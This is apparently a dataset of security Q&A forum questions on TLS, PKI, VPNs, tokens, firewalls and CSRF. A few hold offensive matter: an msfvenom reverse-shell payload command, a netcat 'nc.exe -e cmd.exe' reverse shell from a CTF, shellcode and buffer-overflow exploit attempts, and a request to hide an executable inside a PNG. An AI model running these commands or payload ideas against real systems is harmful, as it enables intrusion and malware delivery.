instruction
stringlengths
24
29.9k
It seems as if they are either synonyms, or cipher was an older term for when they directly translated the same number (or almost same number) of "encrypted" characters into the same number of plaintext ones, whereas encryption means that they use such a complicated "algorithm" as to make it impossible to deduce the le...
I am working on issues reported by Nessus. Most of the issue types are missing headers and cookie flags. The tricky part here is these issues have been reported at different port numbers, for example 443, 8008 and 8080. Can anyone please help on how to check the request and response on these port numbers or how to che...
Currently i am using TLS protocol for a secure communication between my server and client. I use PKI for key/certificate Management. If i want to switch to IPsec for secure communication, how will the PKI be affected or what changes should i do?
I am developing an application containing both Python backend and frontend using Electron. There is no authentication. The two components communicate through WebSocket. How should I prevent the third party from connecting to the port?
I have a website with many pages. There are few lines of text on one of these pages which should NOT be visible to search engines - it means no one should be able to find my website after searching for the information provided in these few lines. How can I achieve that? I was thinking to exclude this particular page us...
A website restricts these characters from passwords: # * ( ) % At a casual glance, it looks like they're not sanitizing data input to the database or hashing passwords, but I'm a hobbyist. Should I contact the IT maintainer? This is a new site that was just launched to replace an old one within my industry.
With the 8.2 release of OpenSSH, they have declared that ssh-rsa for SHA-1 will soon be removed from the defaults: Future deprecation notice It is now possible[1] to perform chosen-prefix attacks against the SHA-1 hash algorithm for less than USD$50K. For this reason, we will be disabling the ssh-rsa public key signat...
I got a notebook running Windows 10 from my company which I am officially allowed to use privately. I have to travel a lot. I don't want to carry a second notebook. Since the admins have access to the device, like for company administered browsers, updates or whatever, I don't want to use it without an extra layer of...
today I was surfing the web with Comodo dragon browser and it gave me this warning: it don't tell me which certificate! is there any tool that I can use to scan my installed certificates? and also because I'm living in Iran and websites like youtube are filtered by government I use vpn to bypass this filtering. is it ...
In APIs that authenticates with a single API key (eg a long random string) via Basic Auth, I have seen that most (eg Stripe, Unbounce) sends the API key as the username, leaving the password field blank. The only service I have seen that sends the API key in the password field is Bing. Is there any reason to choose to ...
From a security perspective is it ok to store the permissions of a user inside the body of the Json Web Token? For example a jwt body like this: { "username": "lukas", "isAdmin": true } The integrity of the body is verified by the signature of the token so I think it is no problem to use this technique but as it...
A few minutes ago an error popped up on my error tracing app. I'm hosting a Django app which has login system. The error says: Invalid HTTP_HOST header: 'www.moxing.one'. You may need to add 'www.moxing.one' to ALLOWED_HOSTS. status_code: 400 "<WSGIRequest: GET '/forum.php'>" From IP address: 70.39.117.18 I've fou...
Got a query about self-signed certificates that after doing several searches I don't feel I've got a concrete answer for. Say I have generated a self-signed server certificate with CN=localhost. Does this mean that I can use that certificate in a server and be able to run that server on any machine in a LAN, where any ...
In our mobile application, users need to register first before they can use it. After successful registration, they an now login and use features of the app. Now we will have a feature in our application where all users who have records in the active directory and "master" database but not yet registered in the app wou...
Every time I install Windows 10, I painstakingly go through every setting that can be found in any GUI setting for the OS, disabling everything that sounds creepy. One of the most disturbing things I've found is what I believe is called "automatic sample submission", which means that the built-in anti-virus tool in Win...
I'm just learning most of this stuff so bare with me; Using a firewall service such as iptables, is there a point in filtering/blocking a port that is not in use meaning it's closed by default?
I have successfully overwritten the EIP register (pointing to my shellcode) but the shellcode is not executing. I compiled with the command gcc -g -fno-stack-protector -z execstack -no-pie vuln.c -o vuln Here's the output of gdb-peda (attempt 1): [----------------------------------registers--------------------------...
We are about to sign a contract with an OCR service provider (Scanned documents(personal information) will be sent, which will be processed OCR, data transmitted back and documents deleted.)The service provider offers an OCR service using an application developed by him available in the cloud. We use an internally dev...
I am developing a reliable system for token generation and validation used mainly for links in confirmation emails (reset password request, change email flow, activate an account, etc...). There are a few things that are mandatory: Token must be unique (even when two generated at the same time) in system (in database)...
In March most browsers will stop supporting TLS 1.0 & 1.1 my website already uses 1.2 but some external apis still use TLS 1.0. What will happen with the requests to those apis? Will they keep working as they are or will there be some sort of error?
I want to set up my company's laptops in a way that all files created on these laptops can only be read by these laptops. If it is copied to a USB then that file is only readable when plugging that USB on a company laptop. If plugging in or copied to another non-authorized laptop then it is not readable. Ernst and Youn...
The only technology "news" I ever hear about go on about "performance this" and "performance that". I haven't felt that my computer was "slow" since the 1990s. 20 years ago. Yet this is the only thing I ever hear anyone talk about. Why, for example, do I have to run all these Composer PHP libraries with 100% privileges...
Recently I've been trying to escape sandbox Chrome OS for fun, bounties, etc. I found you can run straight system commands through chrome:// urls (such as displaying USB Detected message, or something). However, Google is notoriously good at XSS prevention and appears to have placed that into their chrome:// urls. I've...
If I am using one a VPN Service, but it allows up to lets say 8 devices to connect, are all the devices/users able to view traffic from other users/devices? Or is each VPN connection creating its own tunnel, thus its basically saying that only 8 Tunnels can be made/created at once? Also once connected to my VPN is it ...
How can I close ports in windows 10 and what ports are unnecessary to be open? How do I find these open ports to close? Also if I close a specific port on windows 10 do I have to close the outbound and inbound port?
I have collected an encrypted RocksDB file from an Android application. By reverse engineering the mobile application I have also collected the encryption key. However, for the life of me I cannot find a client that supports decrypting RocksDB databases. How do I decrypt a RocksDB database?
What is the best way to take a wireless hotspot that is owned by someone else, create my own hotspot or VLAN to be able to Firewall / Not allow my devices to view the other individuals' devices? I am already using a VPN, but I want to be able to create my own hotspot from another hotspot and firewall it or create anot...
Two days ago I built a Debian 10 server in the United States for use as a file server for my web application. When I created the server, I installed the fail2ban package and configured a basic, minimal firewall using the following rules: *filter # Allow all loopback (lo0) traffic and reject traffic # to localhost tha...
I'm very interested in attribute-based encryption (ABE). I see various working examples online, and I want to know, has it been verified as production-ready? What does it mean to have a security audit, and how do I know if ABE is safe for use with real customer data? The use case I have in mind is for powering role-bas...
I am building a system that's going to host medical records for the users. The system needs to be secure, so that only the users with correct auth can access their data (data will be encrypted, so not even the devs can access user data). But at the same time, it needs to be convenient, so that a user can "Forget his pa...
I'm looking into Angular and read that typescript is compiled to javascript. Is everything viewable/visible to users that I write using typescript? With PHP I know you run code that's only visible to the server. Does Angular also have code visible only to the server or is everything visible to everyone? There is a rea...
I have the followin scenario and looking for a secure solution. There is a web application, hosted on IIS. The connection is established over TLS 1.2 and is encrypted. So the steps are Client connects to the server over ssl Client sends the username and password (as well xsrf token) The server authenticates the user a...
The first point, that it updates with new release. So if somebody discovered new payload for popular frameworks, it will be in burp only with new release. Does Burp app load payloads from Internet sources? P.S. Except plugins =)
I am going through the on-boarding process for a summer internship with a well-known tech/bank company. I've received mail from HR requesting me to fill out an I-9 form via the external service they use. I received, in two separate emails, a username and password (both in plain text, of course) for the service so that ...
I am new to this, so I applogise if this is a silly question! I have created a reverse shell on a Windows box using an exploit script and the following MSFVENOM to create a reverse shell. msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.49 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x...
If you look at a DigiCert certificate: https://baltimore-cybertrust-root.chain-demos.digicert.com/info/index.html, you can see that it has the following: Key: Size: 2048 bit RSA Key Usage: Certificate Sign, CRL Sign Basic Constraints: CA:TRUE There is no CRL distribution points listed here. Where would I get the...
No code yet. I have used binary and base64 to embedded exe and png file into png. But none of these methods works for me. Because when I run png file exe is not run. I don't know why. I need help in this project saveFileDialog1.InitialDirectory = @"C:\"; saveFileDialog1.Filter = "PNG (*.png)|*.png|JPG (*.jpg*)...
It is often cited "to load from untrusted memory to a trusted system memory" when describing the secure boot process. I wonder, when can we consider a memory as "trusted"?
OpenSSH version 8.2 introduced support for FIDO/U2F hardware authenticators, via the new public key types "ecdsa-sk" and "ed25519-sk". I currently have SSH authentication set up in combination with gpg subkeys by using my security key in GPG mode. I am wondering if there is any benefit (especially security related) to ...
There are standards for Time-based (TOTP) and Counter-based (HOTP) One Time Password schemes. Generated OTPs are independent of the transactions they are used for, such as authorizing a login or a money transfer. These are widely supported by smartphone apps (e.g. Google Authenticator) and hardware tokens (e.g. Yubikey...
Suppose my app is hosted on multiple servers, within the same data center (say in AWS or DigitalOcean). To secure communication between these servers, I use iptable to whitelist each other's IP. Question: is whitelisting IP secure enough to ensure the identity of the request? Or is it actually possible for a hacker ser...
I suspect it’s an attempt at getting into an existing account using a leaked email/password combo. I update my passwords regularly and do not reuse, so I don’t think the attack will be successful, but it is still frustrating. Right now, I’m changing the password of the accounts created and activating two-factor authent...
I am very curious if it is possible to find the real IP address of a domain "protected" by a CDN service. For example, www.cnn.com uses Fastly service, and the domain name only resolves to a Fastly edge server's IP. If I scan the whole 4 billion IP range, sending HTTP GET request with header Host: www.cnn.com, how pos...
The domain & tenant has SPF and DKIM properly configured and DMARC policy set to p=reject. Still, emails spoofed with the domain in the From header aren't rejected, but appear in the Junk Email folder on Office 365. People do check their Junk Email for false positives, and are still reading all the CEO frauds, sextorti...
I am having 2 cameras in my PC. When I try to trigger camera in firefox it always opens a permission prompt box with a webcam options. But I don't want to show the camera options in the prompt box. So Is there any customizable thingy to customize the Prompt box for firefox by updated any javascript changes (I am a deve...
On a Windows system, I'm able to get a good idea of most outgoing traffic by enabling DNS query logging, but I am missing those connections that are made straight to hardcoded IP addresses. What would be effective ways of specifically logging those connections? The purpose is to get a clear picture of all outgoing traf...
On the last few days, one of our endpoints calls to testgvbgjbhjb.com the calls came from google chrome outside. I used TCPView to find suspicious connections and check if there any unknown extension. The owner of the domain made it a 127.0.0.1 record and set the next txt record: "The owner of this domain does not kno...
I built my own private network with OpenVPN. I bought a VPS at hosting provider A(closer to home) and another two at hosting provider B(cheaper). Using openvpn I connected the two to the OpenVPN server. I configured the hosts at B to ONLY ALLOW connections from the VPN using UFW, so they should be safe. But now I'm sca...
My main goal is to build Raspberry Pi cloud storage and I want to access it remotely. I can easily send commands via SSH. However, transferring files bugged me due to its slow connection speed, or latency due to buffer, or other factors. I checked SFTP and FTPS for this. My main goal is to send a file, let's say mixed ...
There is a web server I'd like to recon using httprint. But that web server has a basic auth protection on 443. Port 80 is not responding. When I launch httprint, it says Unspecified Error The same thing happens with netcat. It fails because of Basic Auth (ie "Connection Refused") When basic auth is disabled, both netc...
When a JWT id_token with a single audience is presented to a resource server which has multiple configured audience values, should the resource server reject the validity of the token on the basis of the mismatch in audiences (ie JWT has one, resource server wants all of the ones we have configured), or should the reso...
What if I logged in to my work PC using my personal Google account? Can my employer see what I have been googling on my phone under my work desktop's browsing history? What about under “my activity” in Google? Would it be auto synced? Simply put, I logged in to my work PC and personal mobile using the same Google acc...
I have installed a WireGuard VPN server on a Raspberry Pi (running Raspbian) using PiVPN and I would like to either block the VPN clients to access specific websites (i.e. block them access https://www.foo.com and https://www.bar.com) or let them access them by using their IP and not the Raspberry's. Furthermore, I...
It truly feels like we are living in an "afterworld", long past the era when smart, intelligent, real men and women worked on things that really did matter. I'm talking about Enigma, Lorenz, Collossus, etc. The cipher machines and code-breaking computers of the WW2. That's when things mattered. Now, it's been ~80 years...
When downloading a file is there a safety concern when downloading from http connections/websites not https?
Let's assume we need a VPN to access some site, e.g. for bypassing geo-blocks. But those site doesn't want VPN users. A good example is Netflix. However, I don't want to specify this just on Netflix, since there are other services blocking VPNs as well. So I thought about how those target site could detect if I'm using...
I've been trying to figure out "practical encryption" (AKA "PGP") for many years. As far as I can tell, this is not fundamentally flawed: I know Joe's e-mail address: cool_joe@gmail.com. I have a Gmail e-mail address: me_78@gmail.com. I have GPG installed on my PC. I send a new e-mail to Joe consisting of the "PGP PUB...
I am currently pentesting a webserver and found out that its subdomain is blocked when pinged from another server (I tried pinging it w/ my Digital Ocean server and other ping tools from websites). But i can access its subdomain with my devices. also i tried using a VPN to check if it is only blocked by country IP but ...
From googling, a lot of file upload vulnerabilities rely on injecting something into the filename and also rely on the picture being stored on the server, is it safe to just do a post request of the picture's content (file-contents: ‰PNG...... via post request) then display it on the browser like, as <img src="data:ima...
There's lots of information on using one email for multiple accounts, but how about the other way around? I'm building a service and considering allowing users to log in with any of their registered emails, using the same password for all of them. Instead of a "my account is my email" mindset, I'm going for a "my accou...
I wold like to set permissions on a per application basis, permissions like: Creation of sockets Creation of sub-process If an application creates a sub-process child processes should inherit the same permissions IPC Shared Memory System mutexes Limit read/write to specific folders and files etc I'm using Windows or ...
Network scenario.... I have a typical enterprise network meaning ISP > Edge Router > Firewall|DMZ > Switch > LAN I know there are several debates about what device comes first, but based on a typical medium-size office (500 people), what should come first in the network architecture; the firewall or the router? My ...
I'm running a Counterstrike server on UDP port 27015. I'm using Amazon AWS to host the game server. I have added only my friends' IPs (about 50 of them) into a security group so the rest of the traffic is always blocked. My enemy is spoofing my players' IPs and sending UDP floods. He sends it from 3-4 IPs. I'm currentl...
I'm building a browser extension that will run some javascript, which contains some sensitive information (essentially injecting authentication info). Therefore I want to make sure it only executes it when the browser is on my trusted domain (let's say www.trusted.com). My current check is something like this: if (url....
My company is implementing software whitelisting processes. There are bunches of freeware needing security testing. Actually, it just requires a preliminary evaluation rather than a deep analysis. How can we assess the security of freeware?
I am working in a global startup. Recently we have undergone several InfoSec processes with potential large corporate customers. All of them asked for: SOC ISO 27k Which makes sense for large organizations. What certificates are worth pursuing in terms of Privacy/Security for a smaller startup? Thought about: UKs ...
I understand that usually one should use Tails on a trusted machine to generate PGP keys. However, I find it difficult to trust a machine with an Intel CPU, many wireless interfaces, a hard disk that may have some hidden caches, etc, etc. So I was considering using a Raspberry Pi 2 B for generating keys. The problem th...
I understand the interest of using a PGP solution that is based on a OpenPGP smartcard, such as the Nitrokey Pro or similar. But then, how can I decide that I trust an OpenPGP smartcard?
I came across a serious issue with Yahoo! Mail that I hope someone would help to fix or raise awareness for. I wanted to create an account on Yahoo! Mail. I entered my phone number to the Yahoo! login, and it asked me if I wanted to receive an access key. So I did that, and typed in the access key... Surprise, I logge...
I wish to add an extra layer of security to my product (web app that people download and install on their server) that have a module that allows me, the developer, to access their sites instantly with just one link. The way I thought about this specific layer, which is on top of your basic security, is, everyone who bu...
I have a question about Tomcat vulnerability CVE-2020-1938 aka Ghostcat. The security researcher who discovered the vulnerability created a write up here: https://www.chaitin.cn/en/ghostcat and a PoC here: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi. Can this vulnerability still be exploited when Apache i...
I'm trying to understand how a pharma hack works. Let's say someone searches for some illegal drug on google and clicks on a link with a domain name www.example.com. Will that person be redirected to a vulnerable page of www.example.com with ads of that illegal drug on it or will he be redirected to the hacker's websi...
I have an intuitive sense of how certificate lifetimes should work in a PKI infrastructure, but I don't consider myself an expert in this field so I would like someone to validate or critique my assumptions: The "leaves" on a PKI hierarchy are the certificates issued by a CA. The maximum lifetime of one such certificat...
I'm a student in the Digital Forensics department. I have to create an image of the HPA of my disk. I searched whole documents about creating HPA image ways but all of them are old methods. For instance, The Sleuth Kit version 1.7.3 allows to create it but it was released in 2003 and the newest versions of TSK have no ...
My organization has upgraded a few printers and decommissioned the internal SSD hard drives by passing the memory chips through a band saw, cutting each chip into halves, and in some cases tearing whole sections loose from the greenboard. These printers were used in such a way that they likely have PHI / HIPAA informat...
I have an application which is packed into a pkg file using productbuild and then is signed using productsign. However when I run pkgutil --check-signature only the SHA1 signature is shown. I also tried to create a self-signed certificate using the instructions reported here but the problem is still the same. The only ...
Our EDI VAN provides software to transmit sensitive customer and business data between our ERP and their website. This software requires that I add several URLs (including one plain HTTP) to the "Trusted" security zone on Windows 10. It also requires that I enable "Display mixed content", "Access data sources across do...
I am trying to complete level 3 of buffer bomb lab. The task is to supply an exploit string that will cause getbuf to return my cookie (0x4b64b076) back to test, rather than the value 1. The exploit code should set the cookie as the return value, restore any corrupted state, push the correct return location on the stac...
I’m aware you can forward connection from a proxy server like this: ssh -R 8080:localhost:80 public.example.com But I’m curious if it’s possible to forward from a free proxy such as: https://free-proxy-list.net Seems unlikely to use the ssh option because I wouldn’t have access to the server. If so what would be a pr...
If I read this correctly the way Tomcat protects against CSRF leaves it vulnerable to the situation where the CSRF token is duplicated in the cookie and request parameters which allows the attacker to simply invent a token (as detailed here under CSRF token is simply duplicated in a cookie). Am I right or missing somet...
I recently tried to understand how PGP works: I encrypt plaintext with my private key and if I send that encrypted text to others with my public key they can encrypt that with my public key?
Objective My goal is to implement a generic mobile client and backend authentication flow, just for practice. Imagine that I am building a note app that stores user notes on the backend. Instead of implementing my own user management in my backend, I want to rely on some popular OIDC providers to authenticate users fro...
Is it possible to make browsers verify that index.html matches some checksum? Context: With subresource integrity, you can specify SHA hashes for URLs, so that you know that you are getting the correct javascript and css files even when they are pulled from a CDN that doesn't use HTTPS. See: https://developer.mozilla....
I know that if I type a password in the username text box and hit enter it is better to change the password just in case. But is it still risky to have written it in the box (with no one watching) without having hit the "log-in" button? Could it be a problem if this happened using public WIFI?
I wish to set up a system that I log into with openVPN on my Raspberry Pi 4. I have already set up an openVPN server with a PKI infrastructure as well as other services that run on the Pi (like pi hole dns + dhcp). The packet forwarding is set up in the iptables like so: iptables -t filter -A FORWARD -i tun0 -o eth0 -j...
This question was originally asked in stack overflow, but it was suggested to ask it here as well.. not looking to improve on hash_hmac functionality. I'm rather interested in the $uri in the examples below.. The theory is that typically we create signed URI's like $superSecret = 'abc'; $data = 'https://localhost/ver...
I am not a network expert but; a recent conversation has come up with a client asking to whitelist a range of ip's (let's say 250 odd for now) to transfer their data to us for processing. I should add here that we would provide an IP address to the client and we would whitelist their IP. It's not a 'here's our domain ...
We're a small UK startup building a small service that allows certain special people (e.g. journalists) to access non-public court information. This information includes a ton of private and sensitive information that cannot just be shared online. From relatively minor things like the name and address of someone accuse...
A common scam is that the victim is contacted by someone claiming to be from the tax office or whatever, and that the victim is required to pay a fine. The victim then buys gift cards and gives the codes to the scammer. My question is - how does this actually end up earning the scammer money? I can understand how i...
If i am chaining multiple VPN's and possibly running through Tor as well, network correlation attacks can be performed against me to try to locate my position. If my network spikes a download for 40MB/s for 3 secounds, governments with collectors accross the world would be able to see this spike and correlate me with m...
Suppose a client places an order on an eCommerce platform. And then claims that they did not place the order. How can we prove that the order was in fact placed by the customer assuming that we cannot trust the platform? One example would be to see the server logs but that wouldn't work if we assume the platform is mal...
Why my generated certificate Owner's CN is not "config.com" ? My config file [ ca ] default_ca = CA_default [ CA_default ] dir = . certificate = rootCA.crt private_key = rootCA.key certs = $dir/certsdb # Where the issued certs are kept new_certs_dir = $certs ...
I have patched my site to prevent JSON hijacking. During this process, I was interested to see if I could actually exploit this vulnerability. So I created a foo.html, added a script tag which source attribute referenced my site which I was logged into. I was unable to exploit the vulnerability. I took a look at the ne...
Is it possible to use openSSL without encryption nor certificate? To test something, I want to connect without any PSK/certificate. Maybe just DH. I tried this: server: openssl s_server -cipher ECDHE-RSA-NULL-SHA -accept 44330 -www -nocert client: openssl s_client -connect 10.10.1.87:44330 -cipher ECDHE-RSA-NULL-SHA ...
So i was testing a desktop application for first time and identified a possible endpoint vulnerable to csrf, but the problem i'm facing is that when i try to test it in a browser the request doesn't automatically get any cookies that are needed for the csrf to work. In summary, is it possible to execute a CSRF attack i...
I have an encoded string: VH+_+smN+IPimspbC+_+ygX73g== The original string is: 51756 So 51756 => VH+_+smN+IPimspbC+_+ygX73g== What is the encoding algorithm type? How can decode VH+_+smN+IPimspbC+_+ygX73g== to original string?
I am working on a XSS attack and I do not think it's vulnerable after numerous hours of trying. However, a second opinion would be great. <script language='javascript'> var redirecturl = 'mailto:xsss@m0chan.com?mkt_tok=mailtokenhere%3D%3D'; function redirect() { var anchor = window.location.hash; window.sel...
during a CTF I encountered the following anomaly regarding PS & cmd.exe: I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell. Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c "nc.exe IP PORT -e cmd.exe...
Is it possible to use openSSL without encryption and without a certificate at the server, but with validation of the client certificate? I'm not sure which cipher allows this (or where to get this info). I tried the following: server: openssl s_server -cipher NULL-SHA256 -nocert -CAfile client_cert.pem -Verify 4 -veri...
There is something which is bothering me when i think about the CA cert and Local cert. Below are my queries which pertains to juniper but may be generic as well. 1) "request security pki ca-certificate enroll ca-profile ROOT2" The above is used to get the CA certificate from the CA server if I am not wrong. And the sa...